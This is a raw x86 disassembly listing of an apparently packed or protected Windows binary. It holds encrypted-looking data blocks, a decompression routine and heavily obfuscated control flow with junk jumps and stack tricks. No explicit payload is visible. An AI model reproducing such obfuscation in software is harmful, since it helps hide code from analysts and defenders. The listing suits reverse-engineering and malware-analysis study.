		dd 85FDB3EBh, 9DDB2794h, 5549B2D7h, 0D63A93C6h,	0FAC2C25Dh
		dd 0C9434BEBh, 0ABD3298Fh, 6B14F0D8h, 8B446249h, 0BE988665h
		dd 0D77CAFB6h, 87973A55h, 762C07B3h, 822EB47Fh,	6D3CF8B6h
		dd 1DACE491h, 0F17FACBCh, 9E1B8C35h, 4E0BA817h,	0CE8112E4h
		dd 0F5BD8A2Ch, 0C32D918Ah, 0AEC2CFC6h, 0E35D0455h, 0ABF9FB9Ah
		dd 0B170D4B8h, 0CF3C492Eh, 0C23DF968h, 0C38F37BDh, 0BB441D7Dh
		dd 0AED72CB9h, 0D7EBD310h, 0B45FF278h, 0A1F8AA64h, 0F9CD795Fh
		dd 3BC35A9Ch, 0E1AA60E4h, 0B55405D2h, 0CE4B159Dh, 0A059786Dh
		dd 22FC03E1h, 72C3BF33h, 98EE980Dh, 0D7079A65h,	85DF7FA4h
		dd 55D4C802h, 96BD7513h, 0BE523058h, 0FA45597Dh, 2ADC8015h
		dd 0C845D8CFh, 533DB759h, 0DA33D7A1h, 56B58EABh, 9DC41749h
		dd 711FC93Eh, 82D08E78h, 7CA38FAAh, 4B6D5F47h, 0EAAE17F9h
		dd 0AEFF10C2h, 0AA017701h, 50FC374Ch, 0E015D585h, 5622ABB4h
		dd 9C0AFE8Fh, 2BCFAABh,	20142FF8h, 0E2C9B835h, 0E479C9FEh
		dd 756FDDAh, 58A68A1Fh,	0F895E8A8h, 3AEE2173h, 64A4F185h
		dd 0FD94A2E8h, 0A505C185h, 0B46AAED2h, 0A7DF22BEh, 0A9E43AE3h
		dd 393CEBDEh, 0EA95DB6h, 58441F82h, 5BA9F80Bh, 25B00E1Eh
		dd 0AAF13066h, 53379DBAh, 45E52F70h, 0B2561A67h, 86D22A0Bh
		dd 0B457D1D6h, 0E03621C3h, 0ABB7A3ECh, 0FE8A2E22h, 771278B5h
		dd 0B5D58B35h, 38AF9B44h, 0BE9C197Fh, 0F60F42DFh, 0F7BBh
		dd 1745E6ACh, 2
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4895E6	proc near		; CODE XREF: sub_48A195+2113p
					; DATA XREF: sub_48EEB0+3Ao

var_11		= byte ptr -11h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00489765 SIZE 00000004 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cld
		push	ebx
		push	edi
		push	esi
		mov	[ebp+var_4], eax
		mov	[ebp+var_8], edx
		mov	esi, eax
		mov	edi, edx
		cmp	word ptr [esi],	434Ah
		jnz	loc_489728
		add	esi, 0Ah
		mov	[ebp+var_C], 8
		xor	ebx, ebx
		mov	edx, 80000000h
		inc	ebx

loc_489617:				; CODE XREF: sub_4895E6+46j
					; sub_4895E6+8Dj ...
		xor	eax, eax
		call	sub_48972F
		jnb	short loc_48962E
		mov	ecx, [ebp+var_10]
		call	sub_489747
		add	al, [ebp+var_11]

loc_48962B:				; CODE XREF: sub_4895E6+65j
		stosb
		jmp	short loc_489617
; ---------------------------------------------------------------------------

loc_48962E:				; CODE XREF: sub_4895E6+38j
		call	sub_48972F
		jb	loc_4896D0
		call	sub_48972F
		jnb	short loc_48969B
		mov	ecx, 4
		call	sub_489747
		dec	eax
		jz	short loc_48962B
		jns	loc_48971A
		call	sub_48972F
		jnb	short loc_489675
		push	ebp

loc_48965B:				; CODE XREF: sub_4895E6+8Aj
		mov	ebp, 100h

loc_489660:				; CODE XREF: sub_4895E6+83j
		call	sub_48973C
		mov	[edi], al
		inc	edi
		dec	ebp
		jnz	short loc_489660
		call	sub_48972F
		jb	short loc_48965B
		pop	ebp
		jmp	short loc_489617
; ---------------------------------------------------------------------------

loc_489675:				; CODE XREF: sub_4895E6+72j
		mov	ecx, 1
		call	sub_489747
		add	eax, 7
		mov	[ebp+var_10], eax
		mov	[ebp+var_11], 0
		cmp	eax, 8
		jz	short loc_489617
		call	sub_48973C
		mov	[ebp+var_11], al
		jmp	loc_489617
; ---------------------------------------------------------------------------

loc_48969B:				; CODE XREF: sub_4895E6+58j
		mov	ecx, 7
		call	sub_489747
		push	eax
		mov	ecx, 2
		call	sub_489747
		mov	ecx, eax
		inc	ecx
		inc	ecx
		pop	eax
		or	eax, eax
		jz	short loc_4896BD
		mov	ebx, eax
		jmp	short loc_48971B
; ---------------------------------------------------------------------------

loc_4896BD:				; CODE XREF: sub_4895E6+D1j
		cmp	ecx, 2
		jz	short loc_489728
		inc	ecx
		call	sub_489747
		mov	[ebp+var_C], eax
		jmp	loc_489617
; ---------------------------------------------------------------------------

loc_4896D0:				; CODE XREF: sub_4895E6+4Dj
		call	sub_489753
		dec	ecx
		loop	loc_4896E1
		mov	eax, ebx
		call	sub_489753
		jmp	short loc_48971B
; ---------------------------------------------------------------------------

loc_4896E1:				; CODE XREF: sub_4895E6+F0j
		dec	ecx
		mov	eax, ecx
		push	ebp
		mov	ecx, [ebp+var_C]
		mov	ebp, eax
		xor	eax, eax
		shl	ebp, cl
		call	sub_489747
		or	eax, ebp
		pop	ebp
		mov	ebx, eax
		call	sub_489753
		cmp	eax, 10000h
		jnb	short loc_489718
		cmp	eax, 37FFh
		jnb	short loc_489719
		cmp	eax, 27Fh
		jnb	short loc_48971A
		cmp	eax, 7Fh
		ja	short loc_48971B
		inc	ecx

loc_489718:				; CODE XREF: sub_4895E6+11Cj
		inc	ecx

loc_489719:				; CODE XREF: sub_4895E6+123j
		inc	ecx

loc_48971A:				; CODE XREF: sub_4895E6+67j
					; sub_4895E6+12Aj
		inc	ecx

loc_48971B:				; CODE XREF: sub_4895E6+D5j
					; sub_4895E6+F9j ...
		push	esi
		mov	esi, edi
		sub	esi, eax
		rep movsb
		pop	esi
		jmp	loc_489617
; ---------------------------------------------------------------------------

loc_489728:				; CODE XREF: sub_4895E6+19j
					; sub_4895E6+DAj
		mov	eax, esi
		pop	esi
		pop	edi
		pop	ebx
		jmp	short loc_489765
sub_4895E6	endp


; =============== S U B	R O U T	I N E =======================================



sub_48972F	proc near		; CODE XREF: sub_4895E6+33p
					; sub_4895E6:loc_48962Ep ...
		add	edx, edx
		jnz	short locret_48973B
		mov	edx, [esi]
		add	esi, 4
		stc
		adc	edx, edx

locret_48973B:				; CODE XREF: sub_48972F+2j
		retn
sub_48972F	endp


; =============== S U B	R O U T	I N E =======================================



sub_48973C	proc near		; CODE XREF: sub_4895E6:loc_489660p
					; sub_4895E6+A8p
		mov	ecx, 8
		call	sub_489747
		retn
sub_48973C	endp


; =============== S U B	R O U T	I N E =======================================



sub_489747	proc near		; CODE XREF: sub_4895E6+3Dp
					; sub_4895E6+5Fp ...
		xor	eax, eax

loc_489749:				; CODE XREF: sub_489747+9j
		call	sub_48972F
		adc	eax, eax
		loop	loc_489749
		retn
sub_489747	endp


; =============== S U B	R O U T	I N E =======================================



sub_489753	proc near		; CODE XREF: sub_4895E6:loc_4896D0p
					; sub_4895E6+F4p ...
		xor	ecx, ecx
		inc	ecx

loc_489756:				; CODE XREF: sub_489753+Fj
		call	sub_48972F
		adc	ecx, ecx
		call	sub_48972F
		jb	short loc_489756
		retn
sub_489753	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4895E6

loc_489765:				; CODE XREF: sub_4895E6+147j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_4895E6
; ---------------------------------------------------------------------------
		align 2

loc_48976A:				; CODE XREF: ss.cste0:0048D650j
					; DATA XREF: sub_48EEAAo ...
		xchg	edi, [esp]
		pop	edi
		push	7DF9818h
		adc	esi, 185FC28Ah
		jmp	loc_4898B2
; ---------------------------------------------------------------------------
		mov	esi, ebp
		jmp	loc_48CAE4
; ---------------------------------------------------------------------------
		db 2 dup(0), 64h	; CODE XREF: sub_489F18+209j
		dd 35FFh, 0B8E80000h, 2Bh, 50BE8C0Fh, 0C3810000h, 36FE18F1h
					; CODE XREF: sub_48A195+4452j
		dd 59240C87h, 0E9243487h, 592h,	87D58B52h, 0EC8B2414h
		dd 1BCE8h, 0E9000000h, 1723h, 0D09E9h, 5F000000h, 0AC05CF81h
		dd 0E781F7E3h, 1A3C8B1Fh, 8F6DEF81h, 75E9EFABh,	5E000025h
		dd 0B74DF381h, 0C3031DF2h, 3EBCE95Bh, 0E8000000h, 2388h
		dd 14CBC0F7h, 0E9E980E0h, 21h, 6E416800h, 815FD806h, 25EA1FF7h
		dd 8FF8113h, 0E90C9380h, 2DEEh,	48E9A868h, 5476E900h, 81580000h
		dd 0ED5F20C0h, 6DF0810Ch, 6837CA57h, 48BFA7h, 5137E9h
		dd 0C3000000h, 0D1810000h, 53343AC0h, 0EF25F781h, 0FD0300B1h
		dd 9AFE8h, 3E90000h, 6,	6F683D00h, 0C3004898h, 38E90000h
		dd 0Bh,	52A0E9h, 0F000000h, 40580h, 2FAE800h, 0E9000000h
		dd 4A4Eh, 5200C300h, 1487D68Bh,	7596824h, 0FDE932CAh, 0Eh
		dd 240C8700h, 0E8D0FF59h, 3EA2h, 2BCE900h, 0EAE90000h
		dd 0E900004Ah, 51DEh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_4898B2:				; CODE XREF: ss.cste0:00489779j
		pop	esi
		rol	esi, 4
		jnb	loc_48DF6C
		add	cl, ch
		in	al, 3Ah
; ---------------------------------------------------------------------------
		dd 0FAE90000h, 8500002Bh, 77DE9CBh, 0
; ---------------------------------------------------------------------------
		cdq
		cmp	al, 24h
		mov	ebp, edi
		xchg	eax, [esp]
		mov	edi, eax
		pop	eax
		retn
; ---------------------------------------------------------------------------
		pop	eax
		add	eax, 664565DEh
		and	eax, 9E8EEEB8h
		add	eax, 0EE4848C9h
		jmp	loc_48D87E
; ---------------------------------------------------------------------------
		dd 0E6BA0000h, 0E90048AFh, 2A18h, 0D8030000h, 0D5E9F385h
		dd 25h,	301FE800h, 0
; ---------------------------------------------------------------------------
		jmp	loc_48C9D0
; ---------------------------------------------------------------------------
		db 2 dup(0), 0BAh	; CODE XREF: ss.cste0:loc_48E948j
		dd offset loc_48D9D4
; ---------------------------------------------------------------------------
		jmp	loc_48A326
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h	; CODE XREF: sub_48A195+564j
		dd 6406C600h, 35FF645Eh, 0 ; CODE XREF:	sub_48A195+480Ej
dword_489934	dd 258918h, 64000000h, 20058Bh,	0F4E90000h, 1Fh, 0A4E36899h
					; DATA XREF: sub_48A195+4809o
		dd 70E90048h, 50h, 0FCDB900h, 48795EEh,	34875824h, 1698E924h
		dd 0E9000000h, 5419h, 0F9E90000h, 26h, 24348700h, 71E8505Eh
		dd 11h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_489981:				; CODE XREF: sub_48A195:loc_48AE5Dj
		mov	byte ptr [eax],	0Fh
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx
		jmp	loc_48D777
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		dd 17810F00h, 81000031h, 65ED76CEh, 77C68143h, 0C1B9B622h
		dd 0C6810EC6h, 0FBCD353Ah, 1522E9h, 0C30000h, 1D12E9h
		dd 0E9C10000h, 2F06E904h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_4899C3:				; CODE XREF: sub_48A195+C62j
		mov	byte ptr [ebx],	0C6h
		pop	ebx
		call	sub_48E74D
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 820F0000h, 3FDEh, 0DD9CB951h, 56E90048h, 0F000017h
		dd 29582h, 10F78100h, 85082A01h, 0FE95FC7h, 8700003Bh
		dd 2C872434h, 5DF58B24h, 15FDE8h, 0B32E800h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489DC5

loc_489A07:				; CODE XREF: sub_489DC5+Dj
		jmp	locret_48B17E
; END OF FUNCTION CHUNK	FOR sub_489DC5
; ---------------------------------------------------------------------------
		dd 24148700h, 8B242C87h, 0C2815DD5h, 864B81DFh,	819E8h
					; CODE XREF: sub_48A195+DBAp
		dd 0C300h, 2F15E9h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E438

loc_489A2A:				; CODE XREF: sub_48E438:loc_48C191j
		call	sub_48BE7A
		add	dh, al
		add	eax, offset loc_48A2F5
		call	near ptr 0CF4EA001h
		dec	eax
		add	[edi-30F6FA3Ah], al
		dec	eax
		add	[ebx-3Ah], bl
		add	eax, offset loc_48CF0A
		shufps	xmm0, oword ptr	ds:oword_48E34A, 0Fh
		retn
; END OF FUNCTION CHUNK	FOR sub_48E438
; ---------------------------------------------------------------------------
		push	edx
		not	edx
		jmp	loc_48EC65
; ---------------------------------------------------------------------------
		jz	sub_489F18
		jmp	loc_48D75D
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		dd 6BE90000h, 0E900001Eh, 1EF0h, 4CD1D681h, 89E9F984h
					; CODE XREF: sub_48EC70+10j
		dd 12h,	0DBE900C3h, 29h, 0AEFCBB53h, 0B6E90048h, 38h, 347EC968h
		dd 242C87E8h, 0C15DDD8Bh, 0C38109C3h, 0A7248237h, 3BC4E9h
		dd 0C3000000h, 3CE90000h, 0E9000044h, 1542h, 0C100C300h
		dd 0E8030FC8h, 0C72E9h,	0C300h,	5A241487h, 48EABA68h, 51D9E900h
		dd 0B0680000h, 58FB08ADh, 0E5FBC881h, 0E0818A87h, 0B6DFB045h
		dd 0DE666857h, 7AE90048h, 19h, 4879C00h, 21685824h, 5F75FB16h
		dd 0EF89EF81h, 0CF81BCA7h, 919A8926h, 3EE3E9h, 35680000h
		dd 0E90048E6h, 3389h, 68C50300h, 48C2B5h, 0CBCE9h, 0F000000h
		dd 0B1C87h, 24348700h, 3C2C15Eh, 0F7E8C2AAh, 49h, 3C5C100h
		dd 0C1E5C181h, 0C8794C1h, 978E924h, 68000000h, 8FC6C8A2h
		dd 2B5CE958h, 93E80000h, 3Ah, 0A2F5058Dh, 0E8570048h, 0FFFFFF86h
		dd 87240487h, 0C78B243Ch, 0EB810F5Fh, 0E9000008h, 1FACh
		dd 8D0F0000h, 2669h, 2D0AE9h, 1CEAC100h, 265AE9h, 87000000h
		dd 393DE92Eh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_489BA6:				; CODE XREF: sub_48A195+13Bj
		jl	loc_48B521
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 0D4E90000h, 46h, 43398C0Fh, 0CD2B0000h, 1955E9h, 87000000h
		dd 3487240Ch, 5ECE8B24h, 48E08168h, 29AAE900h, 3000000h
		dd 468EE9D1h, 34870000h, 5ED68B24h, 0B15E8h, 0EFFA6800h
		dd 815F9CC9h, 4A5EEBCFh, 1A850FD0h, 7, 0E1D38100h, 0F7B84802h
		dd 29956BC2h, 6FEE948h,	0
; ---------------------------------------------------------------------------
		not	ebx
		jmp	loc_48DD71
; ---------------------------------------------------------------------------
		db 0E8h
		dd 24E3h, 0E9810000h, 0C09A918Eh, 0EDE9C38Bh, 0FFFFFBh
		dd 242C8700h, 815DF58Bh, 9918F6EEh, 0E9D868C3h,	0EEE90048h
		dd 21h,	312FE9C3h, 0BA520000h, 48BB02h,	38A2E9h, 0C6000000h
		dd 5859C301h, 0AD54E881h, 39E9FD56h, 0C3000024h, 4870000h
		dd 0F7E85624h, 29FFFFFAh, 342AE9D0h, 810F0000h,	7EEh, 87CB8B51h
		dd 3CBB240Ch, 0E900489Bh, 22E3h, 0B6B95100h, 0E90048D0h
		dd 0FFFFFFBBh, 0C30000h, 1890E900h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_489CA7:				; CODE XREF: sub_48A195:loc_48C484j
		mov	esi, ebp

loc_489CA9:				; DATA XREF: sub_48A195+1581o
		dec	edx
		xor	al, 24h
		mov	ebp, esp
		jo	loc_48CF3D
		call	loc_48D17E
		add	[ebx+243C8738h], cl
		pop	edi
		call	loc_48D066
		add	[edi+575F243Ch], al
		push	0AD358DD8h
		pop	edi
		rol	edi, 11h
		sub	edi, 3A84E97Ah
		or	edi, 0F0673B9Fh
		jmp	loc_48B648
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
		dd 0E9C30000h, 256Ah, 0E6810000h, 2FCF6CF7h, 810AC6C1h
					; CODE XREF: sub_48A195+109Fj
		dd 0B500F3C6h, 243487EEh, 498FE9h, 1D680000h, 0E973182Dh
		dd 0B2Ah, 0C36AC681h, 39E99DB6h, 2Ah, 38CB8100h, 815D9DF3h
		dd 0FFFF3DF3h, 87C303FFh, 0D98B240Ch, 30BDE8h, 1001E900h
		dd 0B6E90000h, 22h
		db 0, 0C3h		; CODE XREF: sub_48A195:loc_48DC74j
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489F18

loc_489D46:				; CODE XREF: sub_489F18+27B3j
		jmp	loc_48A118
; END OF FUNCTION CHUNK	FOR sub_489F18
; ---------------------------------------------------------------------------
		align 4
		dd 87318900h, 81582404h, 6AF9FDC1h, 240C878Ah, 0FFFCF3E9h
		dd 680000FFh, 44F19759h, 3535E958h, 0C3000000h,	191EE900h
		dd 0
		dd 0F6E9C713h, 68FFFFFBh, 0E8BEE6E2h, 29F2815Ah, 812F80C7h
		dd 143A91E2h, 2F40E92Ch, 8D0F0000h, 1EC0h, 0C1C1D387h
		dd 41E1810Eh, 81CB0117h, 3BB3E3C1h, 0E9F10338h,	0BEBh
		dd 15D2840Fh, 810F0000h, 4F43h,	3288E9h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_489DC5	proc near		; CODE XREF: sub_48A195+8AAj
					; sub_48A195:loc_48E676p

; FUNCTION CHUNK AT 00489A07 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	3
		pop	eax
		push	(offset	loc_48AB72+1)
		jmp	loc_489A07
sub_489DC5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	esi
		mov	esi, ebx
		xchg	esi, [esp]
		mov	ebx, offset loc_48A8E1
		jmp	loc_48E508
; ---------------------------------------------------------------------------
		align 4
		dd 0E9F12B00h, 3614h, 0C300h, 5F8707C6h, 48A7EE68h, 3A95E900h
					; CODE XREF: sub_48A195:loc_48D630j
					; ss.cste0:loc_48C8EEj
		dd 68000000h, 48A8B8h, 0AA1E9h,	56000000h, 3487F18Bh, 0CA7DB924h
		dd 53E90048h, 0F700002Ch, 2054E9D2h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_489E27:				; DATA XREF: sub_48A195+1C17o
		mov	dword ptr [ebp-10h], 6C6C642Eh
		push	offset dword_48C5DC
		jmp	loc_48A1FA
; ---------------------------------------------------------------------------
		dd 0E0810000h, 680B62BCh, 0BFE8C081h, 59835h, 57000010h
		dd 3C87F88Bh, 0E9D2FF24h, 4BBCh, 0C30000h, 81F28700h, 750699F2h
		dd 81D003F6h, 721900C2h, 0F4E99D98h, 2Dh, 24348700h, 26689C5Eh
		dd 5A5D17B5h, 9776C281h, 0A5E984BCh, 0C3000012h, 0CF810000h
		dd 0D1CF047Bh, 2F0BF781h, 859DFDEFh, 2070E9C7h,	0E8000000h
		dd 893h, 0FCDCE900h, 0F00FFFFh,	9E785h,	0D3F79D00h, 48D20568h
		dd 3341E900h, 0E99C0000h, 0DD3h, 241C8700h, 244C8B5Bh
		dd 1010A10h, 8D000100h,	48DF2405h, 0B8818900h, 0E9000000h
		dd 2E4h, 5680000h, 5802E494h, 62EEF081h, 0E881102Ch, 28D19A9Eh
		dd 8114C0C1h, 2160EEC0h, 4A07E83Bh, 3C60000h, 2414879Ch
		dd 0E95ADA8Bh, 19F4h

; =============== S U B	R O U T	I N E =======================================



sub_489F18	proc near		; CODE XREF: ss.cste0:00489A5Cj
					; ss.cste0:0048E1D5j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00489D46 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A118 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048BD9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C6C5 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		xchg	eax, [esp+0]
		mov	ecx, eax
		pop	eax
		jmp	loc_48BD9F
sub_489F18	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 0C100h
		dd 148704CEh, 0C5035A24h, 7578C081h, 8BE62Dh, 31FFE8h
		dd 9DE90000h, 68000021h, 0EB295B85h, 0EBD0685Eh, 99E90048h
		dd 0Ah,	32E18159h, 81F1C18Eh, 61CC17C9h, 6EE981BFh, 0C1DEBC25h
		dd 0C1811AC1h, 5BC63F4Fh, 1B19E9h, 0C870000h, 0F0815924h
		dd 773B0C10h, 27E9C503h, 0FFFFFCh, 840FD209h, 4BF3h, 87F98B57h
		dd 0E956243Ch, 1ACCh, 0C870000h, 68565924h, 8C964A24h
		dd 1231E9h, 0C30000h, 2406E900h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_489FB8:				; CODE XREF: sub_48A195+A7Ej
		jmp	nullsub_560
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		dw 3487h
; ---------------------------------------------------------------------------
		and	al, 0E9h
		mov	esp, 0FFFFFAh
		push	esi
		push	offset loc_48A93F
		jmp	loc_48A2F0
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_489FD4:				; CODE XREF: sub_48A195+69Cj
		add	eax, 0B4AB9596h
		push	offset loc_48A2D7
		jmp	loc_48ECAE
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 69C68100h, 87D72866h, 8159240Ch, 9079E1C6h, 0E9F56D78h
					; CODE XREF: sub_48A195:loc_48E5DEp
		dd 0F7Fh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BE7A

loc_489FFE:				; CODE XREF: sub_48BE7A:loc_48CBF9j
		xchg	edx, [esp+0]
		mov	esi, edx
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_48BE7A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_531. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		dd offset sub_48EEB0
; ---------------------------------------------------------------------------
		jmp	locret_48B7D8
; ---------------------------------------------------------------------------
		align 4
		dd 116h, 16CE900h, 0
		dd 80571EDBh, 3DF7E900h, 81000000h, 91B0F2EEh, 31CE81FDh
		dd 8117A99Bh, 9B1851C6h, 3741E908h, 0C30000h, 0F892E900h
		dd 0F00FFFFh, 138E85h, 40C5F700h, 0E9EB508Eh, 772h, 14870000h
		dd 0F1685A24h, 5F964E3Fh, 810AC7C1h, 4CE1FDF7h,	0EC7C1FAh
		dd 6D9AC781h, 43E9365Fh, 0FFFFF8h, 0D5E85A00h, 8B00002Dh
		dd 25CCE800h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48A08E:				; CODE XREF: sub_48A195+16AFj
		jmp	nullsub_527
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		cdq
		jmp	loc_48DC50
; ---------------------------------------------------------------------------
		align 4
		push	dword ptr [ebp+10h]
		push	eax
		push	0D5605DA2h
		pop	eax
		jmp	loc_48D169
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_537. PRESS KEYPAD	"+" TO EXPAND]
		dd 8701C600h, 8B241C87h, 81595BCBh, 0D19628C1h,	0DBF18199h
		dd 812ECAF9h, 3CF3AEE1h, 0F7DDE92Eh, 0FFFFh, 5A8302C6h
		dd 48AFDF68h, 1936E900h, 0C6000000h, 8B5E0F06h,	0C0C00900h
		dd 3E3784h, 3E95200h, 0C6FFFFF8h, 0E85E8D06h, 1238h, 0D8E90000h
		dd 0E900001Ah, 48B8h, 6AE90000h, 1Bh, 42A4E95Eh, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489F18

loc_48A118:				; CODE XREF: sub_489F18:loc_489D46j
		mov	byte ptr [edi],	64h
		xchg	ebx, [esp-4+arg_0]
		mov	edi, ebx
		pop	ebx
		jmp	near ptr byte_489785+2
; END OF FUNCTION CHUNK	FOR sub_489F18
; ---------------------------------------------------------------------------
		dw 0C300h
		dd 0AFE900h, 0
; ---------------------------------------------------------------------------
		jmp	locret_48D267
; ---------------------------------------------------------------------------
		align 2
		dw 850Fh
; ---------------------------------------------------------------------------
		inc	ecx
		or	eax, 0
		jmp	locret_48C14D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48A143:				; CODE XREF: sub_48A195+3D37j
		jmp	locret_48AC85
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		sub	ebx, ebp
		and	edi, 0F2E67D49h
		or	edi, ecx
		jmp	loc_48AE7D
; ---------------------------------------------------------------------------
		align 4
		dd 87C68B00h, 0C6BE2404h, 0E90048D8h, 4F5h, 62F08100h
		dd 500030C0h, 48CB3368h, 0FACE900h
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48A17A	proc near		; CODE XREF: ss.cste0:0048D188p
					; ss.cste0:0048DBB0j
		xchg	edx, [esp+0]
		pop	edx
		push	edi
		mov	edi, offset dword_48C044
		jmp	loc_48B06B
sub_48A17A	endp

; ---------------------------------------------------------------------------
		align 2
		mov	byte ptr [eax],	87h
		pop	eax
		push	esi
		pop	ecx
		jmp	loc_48CCF2

; =============== S U B	R O U T	I N E =======================================



sub_48A195	proc near		; CODE XREF: sub_48A195+260Bp

var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h
arg_10		= dword	ptr  14h

; FUNCTION CHUNK AT 00489981 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004899C3 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00489BA6 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00489CA7 SIZE 0000003E BYTES
; FUNCTION CHUNK AT 00489FB8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489FD4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048A08E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A143 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BB18 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048BD4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BD8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BDA5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048BDEF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048BECD SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0048BED9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048BF27 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048BF42 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048BF81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C093 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C099 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C0A7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C164 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048C1FE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0048C21F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048C280 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048C29C SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048C32D SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0048C3C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C410 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C41D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C429 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048C484 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C554 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048C57A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C6D0 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048C750 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048C79C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0048C7C7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048C866 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048C87E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048C8E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C915 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048C99C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048CB4C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048CB62 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CBCB SIZE 00000005 BYTES
